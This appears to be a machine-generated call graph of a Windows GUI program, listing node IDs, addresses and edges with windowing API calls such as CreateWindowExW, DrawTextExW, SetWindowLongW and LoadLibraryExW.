69239->69223 69240->69239 69241->69239 69243 5bdd524 69242->69243 69243->69234 69245 5bdd524 69244->69245 69245->69234 70029 5bd39f8 70033 5bd3a20 70029->70033 70036 5bd3a1c 70029->70036 70030 5bd3a0c 70040 5bd3b06 70033->70040 70037 5bd3a20 70036->70037 70039 5bd3b06 6 API calls 70037->70039 70038 5bd3a5e 70038->70030 70039->70038 70041 5bd3b24 70040->70041 70045 985b800 70041->70045 70048 9857df8 70041->70048 70042 5bd3a5e 70042->70030 70052 985ab38 70045->70052 70047 985b827 70047->70042 70049 9857e03 70048->70049 70050 985b827 70049->70050 70051 985ab38 6 API calls 70049->70051 70050->70042 70051->70050 70053 985ab43 70052->70053 70054 985b8e0 70053->70054 70060 9896488 70053->70060 70066 9896478 70053->70066 70072 985b900 70053->70072 70076 985b8f4 70053->70076 70054->70047 70055 985b8aa 70055->70047 70062 98964ad 70060->70062 70061 989651c 70061->70055 70063 98964ca 70062->70063 70064 985b8f4 6 API calls 70062->70064 70065 985b900 6 API calls 70062->70065 70063->70055 70064->70061 70065->70061 70067 9896488 70066->70067 70069 98964ca 70067->70069 70070 985b8f4 6 API calls 70067->70070 70071 985b900 6 API calls 70067->70071 70068 989651c 70068->70055 70069->70055 70070->70068 70071->70068 70073 985b92f 70072->70073 70074 985b9b6 70073->70074 70075 98551b0 6 API calls 70073->70075 70075->70074 70077 985b92f 70076->70077 70078 985b9b6 70077->70078 70079 98551b0 6 API calls 70077->70079 70079->70078 69246 9895280 69249 5b4ee48 69246->69249 69250 5b4ee76 69249->69250 69253 5b4ef47 69250->69253 69256 98551b0 69250->69256 69261 98551a0 69250->69261 69251 5b4eeee 69252 5b4ef42 KiUserCallbackDispatcher 69251->69252 69252->69253 69257 98551c0 69256->69257 69258 98551fd 69257->69258 69266 5bdbc68 69257->69266 69276 5bdbc65 69257->69276 69258->69251 69262 98551c0 69261->69262 69263 98551fd 69262->69263 69264 5bdbc68 6 API calls 69262->69264 69265 5bdbc65 6 API calls 69262->69265 69263->69251 69264->69263 69265->69263 69267 5bdbca1 69266->69267 69268 5bdbd3f 69267->69268 69286 9850b88 69267->69286 69294 9850b80 69267->69294 69269 5bdbec7 69268->69269 69271 5bd3ccc 2 API calls 69268->69271 69302 9850040 69269->69302 69309 9850011 69269->69309 69270 5bdbf28 69270->69270 69271->69269 69277 5bdbc68 69276->69277 69280 5bdbd3f 69277->69280 69282 9850b80 6 API calls 69277->69282 69283 9850b88 6 API calls 69277->69283 69278 5bdbec7 69284 9850011 2 API calls 69278->69284 69285 9850040 2 API calls 69278->69285 69279 5bdbf28 69279->69279 69280->69278 69281 5bd3ccc 2 API calls 69280->69281 69281->69278 69282->69280 69283->69280 69284->69279 69285->69279 69288 9850cc6 69286->69288 69289 9850bb9 69286->69289 69287 9850bc5 69287->69268 69289->69287 69316 98519e0 69289->69316 69321 98519d0 69289->69321 69290 9850cb9 69291 9850314 6 API calls 69290->69291 69291->69288 69296 9850cc6 69294->69296 69299 9850bb9 69294->69299 69295 9850bc5 69295->69268 69297 9850cb9 69338 9850314 69297->69338 69299->69295 69300 98519d0 CreateWindowExW 69299->69300 69301 98519e0 CreateWindowExW 69299->69301 69300->69297 69301->69297 69303 9850065 69302->69303 69304 985005f 69302->69304 69303->69270 69304->69303 69305 9850198 KiUserCallbackDispatcher 69304->69305 69342 5bde23f 69304->69342 69346 5bde250 69304->69346 69305->69303 69310 9850065 69309->69310 69311 985005f 69309->69311 69310->69270 69311->69310 69312 9850198 KiUserCallbackDispatcher 69311->69312 69314 5bde23f SetWindowLongW 69311->69314 69315 5bde250 SetWindowLongW 69311->69315 69312->69310 69314->69312 69315->69312 69317 9851a0b 69316->69317 69318 9851aba 69317->69318 69326 9852890 69317->69326 69331 98528c0 69317->69331 69318->69318 69322 9851a0b 69321->69322 69323 9851aba 69322->69323 69324 9852890 CreateWindowExW 69322->69324 69325 98528c0 CreateWindowExW 69322->69325 69324->69323 69325->69323 69327 98528a0 69326->69327 69328 98528a8 69326->69328 69327->69318 69334 9850470 69328->69334 69332 9850470 CreateWindowExW 69331->69332 69333 98528f5 69332->69333 69333->69318 69335 9852910 CreateWindowExW 69334->69335 69337 9852a34 69335->69337 69337->69337 69339 985031f 69338->69339 69340 98551b0 6 API calls 69339->69340 69341 9856fcb 69339->69341 69340->69341 69341->69296 69343 5bde24d 69342->69343 69350 9852b28 69343->69350 69347 5bde260 69346->69347 69349 9852b28 SetWindowLongW 69347->69349 69348 5bde272 69348->69305 69349->69348 69353 98504ac 69350->69353 69354 9852b58 SetWindowLongW 69353->69354 69355 5bde272 69354->69355 69355->69305 70080 ad18b18 PeekMessageW 70081 ad18b8f 70080->70081 69356 5bdeab0 69357 5bdead7 69356->69357 69358 5bdeb38 69357->69358 69361 9850990 69357->69361 69364 9850980 69357->69364 69362 98509b7 69361->69362 69367 98502e4 69361->69367 69362->69358 69365 98502e4 6 API calls 69364->69365 69366 98509b7 69365->69366 69366->69358 69368 98502ef 69367->69368 69369 9850b29 69368->69369 69370 9850a8a 69368->69370 69372 9850b80 6 API calls 69368->69372 69376 9850b88 6 API calls 69368->69376 69377 5bdec76 69368->69377 69382 5bdec00 69368->69382 69387 5bdebf4 69368->69387 69369->69362 69370->69369 69371 98502e4 6 API calls 69370->69371 69371->69370 69372->69370 69376->69370 69378 5bdec6a 69377->69378 69380 9850b80 6 API calls 69378->69380 69381 9850b88 6 API calls 69378->69381 69379 5bdec72 69379->69370 69380->69379 69381->69379 69384 5bdec08 69382->69384 69383 5bdec72 69383->69370 69385 9850b80 6 API calls 69384->69385 69386 9850b88 6 API calls 69384->69386 69385->69383 69386->69383 69388 5bdec00 69387->69388 69390 9850b80 6 API calls 69388->69390 69391 9850b88 6 API calls 69388->69391 69389 5bdec72 69389->69370 69390->69389 69391->69389 70082 9858248 70083 9858273 70082->70083 70133 9857d38 70083->70133 70085 985829e 70138 9857d68 70085->70138 70087 98582f8 70088 9857d68 7 API calls 70087->70088 70089 9858316 70088->70089 70143 9857d98 70089->70143 70092 9857d98 7 API calls 70093 985838e 70092->70093 70094 98583e2 70093->70094 70147 985b041 70093->70147 70158 9857da8 70094->70158 70096 985842d 70168 985cab7 70096->70168 70173 985cac8 70096->70173 70097 985844a 70178 9857de8 70097->70178 70099 98584c3 70100 9857df8 6 API calls 70099->70100 70101 98584fd 70100->70101 70185 9895de3 70101->70185 70102 9858571 70103 9857df8 6 API calls 70102->70103 70104 985868f 70103->70104 70105 9857df8 6 API calls 70104->70105 70106 9858776 70105->70106 70189 989aaa8 70106->70189 70193 989aaa0 70106->70193 70107 98587b9 70197 989e9e3 70107->70197 70203 989e9e8 70107->70203 70108 98587f6 70109 9857df8 6 API calls 70108->70109 70110 985887a 70109->70110 70111 9857df8 6 API calls 70110->70111 70112 98589a2 70111->70112 70113 9857df8 6 API calls 70112->70113 70114 9858b08 70113->70114 70115 9857df8 6 API calls 70114->70115 70116 9858bbc 70115->70116 70117 9857df8 6 API calls 70116->70117 70118 9858cb0 70117->70118 70119 9857df8 6 API calls 70118->70119 70120 9858dda 70119->70120 70121 9857df8 6 API calls 70120->70121 70122 9858f17 70121->70122 70123 9857df8 6 API calls 70122->70123 70124 985902f 70123->70124 70134 9857d43 70133->70134 70209 5b496c8 70134->70209 70214 5b46fdc 70134->70214 70135 98592bf 70135->70085 70139 9857d73 70138->70139 70140 9859b53 70139->70140 70141 5b46fdc 7 API calls 70139->70141 70142 5b496c8 7 API calls 70139->70142 70140->70087 70141->70140 70142->70140 70144 9857da3 70143->70144 70146 9858370 70144->70146 70250 98580b4 70144->70250 70146->70092 70148 985aff0 70147->70148 70150 985b04e 70147->70150 70148->70094 70149 985b0b8 70149->70094 70150->70149 70151 985b089 70150->70151 70153 985b0bd 70150->70153 70151->70149 70155 985b041 6 API calls 70151->70155 70157 9857da8 6 API calls 70151->70157 70255 985b110 70151->70255 70152 9857de8 6 API calls 70154 985b1db 70152->70154 70153->70152 70155->70149 70157->70149 70160 9857db3 70158->70160 70159 985b0b8 70159->70096 70160->70159 70161 985b089 70160->70161 70163 985b0bd 70160->70163 70161->70159 70165 985b041 6 API calls 70161->70165 70166 985b110 6 API calls 70161->70166 70167 9857da8 6 API calls 70161->70167 70162 9857de8 6 API calls 70164 985b1db 70162->70164 70163->70162 70165->70159 70166->70159 70167->70159 70169 985cac8 70168->70169 70170 985cb42 70169->70170 70259 985ce58 70169->70259 70268 985ce68 70169->70268 70170->70097 70174 985cae1 70173->70174 70175 985cb42 70174->70175 70176 985ce58 7 API calls 70174->70176 70177 985ce68 7 API calls 70174->70177 70175->70097 70176->70175 70177->70175 70180 9857df3 70178->70180 70179 985b5bc 70179->70099 70180->70179 70181 9857df8 6 API calls 70180->70181 70182 985b79a 70181->70182 70183 9857df8 6 API calls 70182->70183 70184 985b7a5 70183->70184 70184->70099 70187 985ce58 7 API calls 70185->70187 70188 985ce68 7 API calls 70185->70188 70186 9895dea 70186->70102 70187->70186 70188->70186 70191 989aabb 70189->70191 70190 989aade 70190->70107 70191->70190 70192 9894800 DrawTextExW 70191->70192 70192->70190 70194 989aabb 70193->70194 70195 989aade 70194->70195 70196 9894800 DrawTextExW 70194->70196 70195->70107 70196->70195 70199 989ea1f 70197->70199 70198 989eb78 70198->70108 70199->70198 70309 989ed7b 70199->70309 70314 989ecd5 70199->70314 70318 989ecd8 70199->70318 70205 989ea1f 70203->70205 70204 989eb78 70204->70108 70205->70204 70206 989ecd8 DrawTextExW 70205->70206 70207 989ed7b DrawTextExW 70205->70207 70208 989ecd5 DrawTextExW 70205->70208 70206->70204 70207->70204 70208->70204 70211 5b49703 70209->70211 70210 5b499c9 70210->70135 70211->70210 70219 5b4dd21 70211->70219 70224 5b4dd30 70211->70224 70216 5b46fe7 70214->70216 70215 5b499c9 70215->70135 70216->70215 70217 5b4dd30 7 API calls 70216->70217 70218 5b4dd21 7 API calls 70216->70218 70217->70215 70218->70215 70220 5b4dd30 70219->70220 70221 5b4dd75 70220->70221 70229 5b4e000 70220->70229 70233 5b4dff0 70220->70233 70221->70210 70225 5b4dd38 70224->70225 70226 5b4dd75 70225->70226 70227 5b4dff0 7 API calls 70225->70227 70228 5b4e000 7 API calls 70225->70228 70226->70210 70227->70226 70228->70226 70230 5b4e008 70229->70230 70231 5b4e047 70230->70231 70237 5b4c300 70230->70237 70231->70221 70234 5b4e000 70233->70234 70235 5b4e047 70234->70235 70236 5b4c300 7 API calls 70234->70236 70235->70221 70236->70235 70238 5b4c30b 70237->70238 70240 5b4ed60 70238->70240 70241 5b4e74c 70238->70241 70242 5b4e757 70241->70242 70243 5b46fdc 7 API calls 70242->70243 70244 5b4edcf 70243->70244 70247 5b4ee48 7 API calls 70244->70247 70245 5b4edde 70248 9850b80 6 API calls 70245->70248 70249 9850b88 6 API calls 70245->70249 70246 5b4ee09 70246->70240 70247->70245 70248->70246 70249->70246 70251 98580bf 70250->70251 70253 5b46fdc 7 API calls 70251->70253 70254 5b496c8 7 API calls 70251->70254 70252 985a974 70252->70146 70253->70252 70254->70252 70256 985b138 70255->70256 70257 9857de8 6 API calls 70256->70257 70258 985b1db 70257->70258 70260 985ce68 70259->70260 70264 985ce8c 70260->70264 70277 985ada4 70260->70277 70262 985ceb0 70263 985ada4 6 API calls 70262->70263 70265 985ceba 70263->70265 70264->70170 70265->70264 70281 985d370 70265->70281 70291 985d360 70265->70291 70269 985ce70 70268->70269 70270 985ada4 6 API calls 70269->70270 70274 985ce8c 70269->70274 70271 985ceb0 70270->70271 70272 985ada4 6 API calls 70271->70272 70273 985ceba 70272->70273 70273->70274 70275 985d360 DrawTextExW 70273->70275 70276 985d370 DrawTextExW 70273->70276 70274->70170 70275->70274 70276->70274 70278 985adaf 70277->70278 70279 98551b0 6 API calls 70278->70279 70280 985d1c1 70278->70280 70279->70280 70280->70262 70282 985d378 70281->70282 70283 985d38d 70282->70283 70285 985d39b 70282->70285 70289 985d360 DrawTextExW 70283->70289 70290 985d370 DrawTextExW 70283->70290 70284 985d397 70284->70264 70286 985d4b3 70285->70286 70301 9895fd0 70285->70301 70305 9895fe0 70285->70305 70286->70264 70289->70284 70290->70284 70293 985d370 70291->70293 70292 985d38d 70299 985d360 DrawTextExW 70292->70299 70300 985d370 DrawTextExW 70292->70300 70293->70292 70295 985d39b 70293->70295 70294 985d397 70294->70264 70296 985d4b3 70295->70296 70297 9895fd0 DrawTextExW 70295->70297 70298 9895fe0 DrawTextExW 70295->70298 70296->70264 70297->70296 70298->70296 70299->70294 70300->70294 70302 9895fe0 70301->70302 70303 9896003 70302->70303 70304 9894800 DrawTextExW 70302->70304 70303->70286 70304->70303 70306 9895fe8 70305->70306 70307 9894800 DrawTextExW 70306->70307 70308 9896003 70306->70308 70307->70308 70308->70286 70310 989ed7f 70309->70310 70311 989ed06 70309->70311 70310->70198 70312 9894800 DrawTextExW 70311->70312 70313 989ed24 70312->70313 70313->70198 70315 989ecd8 70314->70315 70316 9894800 DrawTextExW 70315->70316 70317 989ed24 70316->70317 70317->70198 70319 989ece0 70318->70319 70320 9894800 DrawTextExW 70319->70320 70321 989ed24 70320->70321 70321->70198 69392 ad192c0 DispatchMessageW 69393 ad1932c 69392->69393 69394 ad18d40 KiUserCallbackDispatcher 69395 ad18da7 69394->69395 70322 5bdcc68 70323 5bdccaa 70322->70323 70324 5bdccb0 SetWindowTextW 70322->70324 70323->70324 70325 5bdcce1 70324->70325 70326 9896450 70330 9895330 70326->70330 70334 9895320 70326->70334 70327 9896475 70331 9895346 70330->70331 70333 985ab38 6 API calls 70330->70333 70338 985b830 70330->70338 70331->70327 70333->70331 70336 985b830 6 API calls 70334->70336 70337 985ab38 6 API calls 70334->70337 70335 9895346 70335->70327 70336->70335 70337->70335 70339 985b859 70338->70339 70341 985b8e0 70339->70341 70342 985b8f4 6 API calls 70339->70342 70343 9896488 6 API calls 70339->70343 70344 9896478 6 API calls 70339->70344 70345 985b900 6 API calls 70339->70345 70340 985b8aa 70340->70331 70341->70331 70342->70340 70343->70340 70344->70340 70345->70340 69396 ad11a4b 69397 ad11a5e 69396->69397 69401 5bdfb28 PostMessageW 69397->69401 69403 5bdfb20 PostMessageW 69397->69403 69398 ad11a81 69402 5bdfb94 69401->69402 69402->69398 69404 5bdfb94 69403->69404 69404->69398 70346 b3a96e0 70347 b3a9730 70346->70347 70351 b3a9b78 70347->70351 70356 b3a9b68 70347->70356 70348 b3a9969 70352 b3a9c22 70351->70352 70353 b3a9b9a 70351->70353 70352->70348 70353->70352 70361 b3a9d81 70353->70361 70368 b3a9d90 70353->70368 70357 b3a9b78 70356->70357 70358 b3a9c22 70357->70358 70359 b3a9d90 5 API calls 70357->70359 70360 b3a9d81 5 API calls 70357->70360 70358->70348 70359->70358 70360->70358 70362 b3a9d92 70361->70362 70363 b3a9db1 70362->70363 70364 b3a84ac 5 API calls 70362->70364 70375 b3a9de1 70363->70375 70379 b3a84ac 70363->70379 70364->70363 70365 b3a9ddb 70365->70352 70369 b3a9da0 70368->70369 70370 b3a9db1 70369->70370 70371 b3a84ac 5 API calls 70369->70371 70373 b3a84ac 5 API calls 70370->70373 70374 b3a9de1 5 API calls 70370->70374 70371->70370 70372 b3a9ddb 70372->70352 70373->70372 70374->70372 70376 b3a9df0 70375->70376 70377 b3a9e1f 70376->70377 70383 b3aa2f8 70376->70383 70377->70365 70380 b3a84b7 70379->70380 70381 b3a9e1f 70380->70381 70382 b3aa2f8 5 API calls 70380->70382 70381->70365 70382->70381 70386 b3aa321 70383->70386 70387 b3aa393 70386->70387 70389 b3aa319 70387->70389 70394 b3aaa41 70387->70394 70399 b3aaa68 70387->70399 70388 b3aa543 70403 b3ab890 70388->70403 70408 b3ab883 70388->70408 70389->70377 70395 b3aaa4a 70394->70395 70396 b3aaa08 70394->70396 70413 b3aaafe 70395->70413 70396->70388 70400 b3aaa70 70399->70400 70402 b3aaafe 5 API calls 70400->70402 70401 b3aaa7b 70401->70388 70402->70401 70404 b3ab898 70403->70404 70450 b3ab8b8 70404->70450 70453 b3ab8ab 70404->70453 70409 b3ab898 70408->70409 70411 b3ab8ab 3 API calls 70409->70411 70412 b3ab8b8 3 API calls 70409->70412 70410 b3ab8a3 70410->70389 70411->70410 70412->70410 70416 b3a9fd0 70413->70416 70417 b3a9fdb 70416->70417 70422 b3aafcb 70417->70422 70430 b3aafd8 70417->70430 70438 b3ab090 70417->70438 70418 b3aaa7b 70418->70388 70426 b3aafed 70422->70426 70423 b3ab24a 70423->70418 70424 b3ab064 70424->70418 70425 b3ab1db 70425->70423 70427 b3ab23b KiUserCallbackDispatcher 70425->70427 70426->70424 70426->70425 70446 b3ab2c0 KiUserCallbackDispatcher 70426->70446 70448 b3ab2bb KiUserCallbackDispatcher 70426->70448 70427->70423 70434 b3aafed 70430->70434 70431 b3ab24a 70431->70418 70432 b3ab064 70432->70418 70433 b3ab1db 70433->70431 70435 b3ab23b KiUserCallbackDispatcher 70433->70435 70434->70432 70434->70433 70436 b3ab2bb KiUserCallbackDispatcher 70434->70436 70437 b3ab2c0 KiUserCallbackDispatcher 70434->70437 70435->70431 70436->70434 70437->70434 70442 b3ab0de 70438->70442 70439 b3ab24a 70439->70418 70440 b3ab25b 70440->70418 70441 b3ab1db 70441->70439 70443 b3ab23b KiUserCallbackDispatcher 70441->70443 70442->70440 70442->70441 70444 b3ab2bb KiUserCallbackDispatcher 70442->70444 70445 b3ab2c0 KiUserCallbackDispatcher 70442->70445 70443->70439 70444->70442 70445->70442 70447 b3ab336 70446->70447 70447->70426 70449 b3ab336 70448->70449 70449->70426 70457 b3aa084 70450->70457 70454 b3ab8b8 70453->70454 70455 b3aa084 3 API calls 70454->70455 70456 b3ab8db 70455->70456 70458 b3aa08f 70457->70458 70459 b3ab090 3 API calls 70458->70459 70460 b3ab8db 70458->70460 70459->70460 70461 5b4bc68 70464 5b4bd4f 70461->70464 70462 5b4bc77 70465 5b4bd71 70464->70465 70467 5b4bd94 70464->70467 70465->70467 70472 5b4c3d8 70465->70472 70476 5b4c3f8 70465->70476 70466 5b4bd8c 70466->70467 70468 5b4bf98 GetModuleHandleW 70466->70468 70467->70462 70469 5b4bfc5 70468->70469 70469->70462 70473 5b4c3dd 70472->70473 70475 5b4c431 70473->70475 70480 5b4bfe8 70473->70480 70475->70466 70477 5b4c40c 70476->70477 70478 5b4bfe8 LoadLibraryExW 70477->70478 70479 5b4c431 70477->70479 70478->70479 70479->70466 70481 5b4c5d8 LoadLibraryExW 70480->70481 70483 5b4c651 70481->70483 70483->70475 69405 b3a7898 69406 b3a78ac 69405->69406 69407 b3a78bd 69406->69407 69411 5bdc9cc 69406->69411 69416 5bdc9d0 69406->69416 69408 b3a78e0 69412 5bdca16 69411->69412 69413 5bdca39 69412->69413 69421 9854ea8 69412->69421 69428 98505c4 69412->69428 69413->69408 69417 5bdca16 69416->69417 69418 5bdca39 69417->69418 69419 98505c4 3 API calls 69417->69419 69420 9854ea8 3 API calls 69417->69420 69418->69408 69419->69418 69420->69418 69422 9854ead 69421->69422 69423 9854f12 69422->69423 69424 9854fbc 69422->69424 69426 9854f6a CallWindowProcW 69423->69426 69427 9854f19 69423->69427 69435 985049c 69424->69435 69426->69427 69427->69413 69429 98505cf 69428->69429 69430 9854f12 69429->69430 69431 9854fbc 69429->69431 69433 9854f6a CallWindowProcW 69430->69433 69434 9854f19 69430->69434 69432 985049c 2 API calls 69431->69432 69432->69434 69433->69434 69434->69413 69436 98504a7 69435->69436 69437 9853889 69436->69437 69439 9853879 69436->69439 69438 98505c4 3 API calls 69437->69438 69440 9853887 69438->69440 69444 98539a0 69439->69444 69449 9853a7c 69439->69449 69455 98539b0 69439->69455 69446 98539b0 69444->69446 69445 9853a50 69445->69440 69460 9853a59 69446->69460 69474 9853a68 69446->69474 69450 9853a3a 69449->69450 69451 9853a8a 69449->69451 69453 9853a59 3 API calls 69450->69453 69454 9853a68 3 API calls 69450->69454 69452 9853a50 69452->69440 69453->69452 69454->69452 69456 98539c4 69455->69456 69458 9853a59 3 API calls 69456->69458 69459 9853a68 3 API calls 69456->69459 69457 9853a50 69457->69440 69458->69457 69459->69457 69461 9853a68 69460->69461 69468 9853a79 69461->69468 69487 9854298 69461->69487 69492 989fd7c 69461->69492 69497 5bdbf60 69461->69497 69520 989fcbc 69461->69520 69526 989fd80 69461->69526 69532 9854288 69461->69532 69537 5bdc95c 69461->69537 69543 989fcc0 69461->69543 69549 5bdbf5c 69461->69549 69572 5bdee5c 69461->69572 69576 5bdee60 69461->69576 69468->69445 69475 9853a79 69474->69475 69476 5bdbf5c 3 API calls 69474->69476 69477 5bdee5c SendMessageW 69474->69477 69478 5bdc95c 3 API calls 69474->69478 69479 989fcc0 3 API calls 69474->69479 69480 989fd80 3 API calls 69474->69480 69481 9854288 3 API calls 69474->69481 69482 989fcbc 3 API calls 69474->69482 69483 989fd7c 3 API calls 69474->69483 69484 5bdbf60 3 API calls 69474->69484 69485 5bdee60 SendMessageW 69474->69485 69486 9854298 3 API calls 69474->69486 69475->69445 69476->69475 69477->69475 69478->69475 69479->69475 69480->69475 69481->69475 69482->69475 69483->69475 69484->69475 69485->69475 69486->69475 69489 98542e4 69487->69489 69488 9854335 69488->69468 69489->69488 69490 5bdc9cc 3 API calls 69489->69490 69491 5bdc9d0 3 API calls 69489->69491 69490->69488 69491->69488 69493 989fd80 69492->69493 69494 989fd95 69493->69494 69580 989fde8 69493->69580 69585 989fde0 69493->69585 69494->69468 69498 5bdbf79 69497->69498 69502 5bdbf8c 69497->69502 69499 5bdbf7e 69498->69499 69500 5bdbfc0 69498->69500 69501 5bdbf83 69499->69501 69505 5bdbf9a 69499->69505 69500->69502 69504 5bdc24c 69500->69504 69506 5bdbfd1 69500->69506 69501->69502 69503 5bdc1aa 69501->69503 69512 5bdc10e 69502->69512 69516 5bdc52b 3 API calls 69502->69516 69517 5bdc530 3 API calls 69502->69517 69600 5bdb338 69503->69600 69608 5bdb3e8 69504->69608 69505->69502 69509 5bdc1b8 69505->69509 69510 5bdc214 69505->69510 69505->69512 69513 5bdc0c6 69505->69513 69506->69502 69506->69512 69506->69513 69518 5bdc52b 3 API calls 69509->69518 69519 5bdc530 3 API calls 69509->69519 69604 5bdb3a8 69510->69604 69512->69468 69590 5bdc530 69513->69590 69595 5bdc52b 69513->69595 69516->69512 69517->69512 69518->69512 69519->69512 69521 989fcc0 69520->69521 69523 989fce2 69521->69523 69524 9854288 3 API calls 69521->69524 69525 9854298 3 API calls 69521->69525 69522 989fd48 69522->69468 69523->69468 69524->69522 69525->69522 69527 989fd8e 69526->69527 69528 989fdc0 69526->69528 69529 989fd95 69527->69529 69530 989fde8 3 API calls 69527->69530 69531 989fde0 3 API calls 69527->69531 69528->69468 69529->69468 69530->69529 69531->69529 69534 98542e4 69532->69534 69533 9854335 69533->69468 69534->69533 69535 5bdc9cc 3 API calls 69534->69535 69536 5bdc9d0 3 API calls 69534->69536 69535->69533 69536->69533 69538 5bdc96e 69537->69538 69540 5bdc990 69537->69540 69539 5bdc97c 69538->69539 69541 9854288 3 API calls 69538->69541 69542 9854298 3 API calls 69538->69542 69539->69468 69540->69468 69541->69539 69542->69539 69544 989fcc8 69543->69544 69546 989fce2 69544->69546 69547 9854288 3 API calls 69544->69547 69548 9854298 3 API calls 69544->69548 69545 989fd48 69545->69468 69546->69468 69547->69545 69548->69545 69550 5bdbf79 69549->69550 69555 5bdbf8c 69549->69555 69551 5bdbf7e 69550->69551 69552 5bdbfc0 69550->69552 69553 5bdbf9a 69551->69553 69554 5bdbf83 69551->69554 69552->69555 69557 5bdc24c 69552->69557 69558 5bdbfd1 69552->69558 69553->69555 69561 5bdc1b8 69553->69561 69562 5bdc214 69553->69562 69564 5bdc10e 69553->69564 69565 5bdc0c6 69553->69565 69554->69555 69556 5bdc1aa 69554->69556 69555->69564 69566 5bdc52b 3 API calls 69555->69566 69567 5bdc530 3 API calls 69555->69567 69559 5bdb338 3 API calls 69556->69559 69560 5bdb3e8 3 API calls 69557->69560 69558->69555 69558->69564 69558->69565 69559->69564 69560->69564 69568 5bdc52b 3 API calls 69561->69568 69569 5bdc530 3 API calls 69561->69569 69563 5bdb3a8 3 API calls 69562->69563 69563->69564 69564->69468 69570 5bdc52b 3 API calls 69565->69570 69571 5bdc530 3 API calls 69565->69571 69566->69564 69567->69564 69568->69564 69569->69564 69570->69564 69571->69564 69574 5bdee7f 69572->69574 69573 5bdee84 69573->69468 69574->69573 69612 5bdb194 69574->69612 69578 5bdee7f 69576->69578 69577 5bdee84 69577->69468 69578->69577 69579 5bdb194 SendMessageW 69578->69579 69579->69577 69581 989fe0e 69580->69581 69582 989fe43 69580->69582 69581->69494 69582->69581 69583 9854288 3 API calls 69582->69583 69584 9854298 3 API calls 69582->69584 69583->69581 69584->69581 69587 989fde7 69585->69587 69586 989fe0e 69586->69494 69587->69586 69588 9854288 3 API calls 69587->69588 69589 9854298 3 API calls 69587->69589 69588->69586 69589->69586 69591 5bdc53b 69590->69591 69592 5bdc542 69590->69592 69591->69512 69594 5bdc95c 3 API calls 69592->69594 69593 5bdc548 69593->69512 69594->69593 69596 5bdc53b 69595->69596 69597 5bdc542 69595->69597 69596->69512 69599 5bdc95c 3 API calls 69597->69599 69598 5bdc548 69598->69512 69599->69598 69601 5bdb343 69600->69601 69602 5bdc530 3 API calls 69601->69602 69603 5bdcb46 69602->69603 69603->69512 69605 5bdb3b3 69604->69605 69606 5bdc530 3 API calls 69605->69606 69607 5bdea9c 69606->69607 69607->69512 69609 5bdb3f3 69608->69609 69610 5bdc530 3 API calls 69609->69610 69611 5bde451 69610->69611 69611->69512 69613 5bdff00 SendMessageW 69612->69613 69614 5bdff6c 69613->69614 69614->69573 69615 5bd5f98 69617 5bd5fac 69615->69617 69616 5bd5fc7 69617->69616 69620 98598c8 69617->69620 69618 5bd6045 69621 98598eb 69620->69621 69622 9859908 69621->69622 69625 989f448 69621->69625 69629 989f444 69621->69629 69622->69618 69626 989f450 69625->69626 69633 9894800 69626->69633 69628 989f4d9 69628->69628 69630 989f448 69629->69630 69631 9894800 DrawTextExW 69630->69631 69632 989f4d9 69631->69632 69632->69632 69634 989480b 69633->69634 69635 98960da 69634->69635 69637 9894820 69634->69637 69635->69628 69638 989482b 69637->69638 69639 989b2c7 69638->69639 69642 989b2e0 69638->69642 69646 989b2dc 69638->69646 69639->69635 69643 989b2e8 69642->69643 69650 989b324 69643->69650 69644 989b30e 69644->69639 69647 989b2e0 69646->69647 69649 989b324 DrawTextExW 69647->69649 69648 989b30e 69648->69639 69649->69648 69651 989b363 69650->69651 69652 989b352 69650->69652 69653 989b3f1 69651->69653 69656 989ba47 69651->69656 69661 989ba50 69651->69661 69652->69644 69653->69644 69657 989ba50 69656->69657 69658 989bb7e 69657->69658 69666 989f818 69657->69666 69671 989f813 69657->69671 69658->69652 69662 989ba58 69661->69662 69663 989bb7e 69662->69663 69664 989f818 DrawTextExW 69662->69664 69665 989f813 DrawTextExW 69662->69665 69663->69652 69664->69663 69665->69663 69667 989f82e 69666->69667 69676 989fc7b 69667->69676 69709 989fc80 69667->69709 69668 989f8a4 69668->69658 69672 989f82e 69671->69672 69674 989fc7b DrawTextExW 69672->69674 69675 989fc80 DrawTextExW 69672->69675 69673 989f8a4 69673->69658 69674->69673 69675->69673 69677 989fc7f 69676->69677 69679 989fc06 69676->69679 69678 989fc9e 69677->69678 69740 5bd0391 69677->69740 69746 5bd03d9 69677->69746 69752 5bd0395 69677->69752 69758 5bd039d 69677->69758 69764 5bd0399 69677->69764 69770 5bd03a5 69677->69770 69776 5bd03a3 69677->69776 69782 5bd03af 69677->69782 69788 5bd03a9 69677->69788 69794 5bd03b1 69677->69794 69800 5bd0371 69677->69800 69806 5bd03b5 69677->69806 69812 5bd0375 69677->69812 69818 5bd03b9 69677->69818 69824 5bd0379 69677->69824 69830 5bd03bd 69677->69830 69836 5bd037d 69677->69836 69842 5bd0443 69677->69842 69848 5bd0381 69677->69848 69854 5bd03c1 69677->69854 69860 5bd0385 69677->69860 69866 5bd03c5 69677->69866 69872 5bd03c9 69677->69872 69878 5bd0448 69677->69878 69884 5bd03cd 69677->69884 69890 5bd0389 69677->69890 69896 5bd03d1 69677->69896 69902 5bd038d 69677->69902 69908 5bd03d5 69677->69908 69678->69668 69679->69668 69711 5bd03bd DrawTextExW 69709->69711 69712 5bd037d DrawTextExW 69709->69712 69713 5bd03b9 DrawTextExW 69709->69713 69714 5bd0379 DrawTextExW 69709->69714 69715 5bd03b5 DrawTextExW 69709->69715 69716 5bd0375 DrawTextExW 69709->69716 69717 5bd03b1 DrawTextExW 69709->69717 69718 5bd0371 DrawTextExW 69709->69718 69719 5bd03af DrawTextExW 69709->69719 69720 5bd03a9 DrawTextExW 69709->69720 69721 5bd03a5 DrawTextExW 69709->69721 69722 5bd03a3 DrawTextExW 69709->69722 69723 5bd039d DrawTextExW 69709->69723 69724 5bd0399 DrawTextExW 69709->69724 69725 5bd03d9 DrawTextExW 69709->69725 69726 5bd0395 DrawTextExW 69709->69726 69727 5bd03d5 DrawTextExW 69709->69727 69728 5bd0391 DrawTextExW 69709->69728 69729 5bd03d1 DrawTextExW 69709->69729 69730 5bd038d DrawTextExW 69709->69730 69731 5bd03cd DrawTextExW 69709->69731 69732 5bd0389 DrawTextExW 69709->69732 69733 5bd03c9 DrawTextExW 69709->69733 69734 5bd0448 DrawTextExW 69709->69734 69735 5bd0385 DrawTextExW 69709->69735 69736 5bd03c5 DrawTextExW 69709->69736 69737 5bd0381 DrawTextExW 69709->69737 69738 5bd03c1 DrawTextExW 69709->69738 69739 5bd0443 DrawTextExW 69709->69739 69710 989fc9e 69710->69668 69711->69710 69712->69710 69713->69710 69714->69710 69715->69710 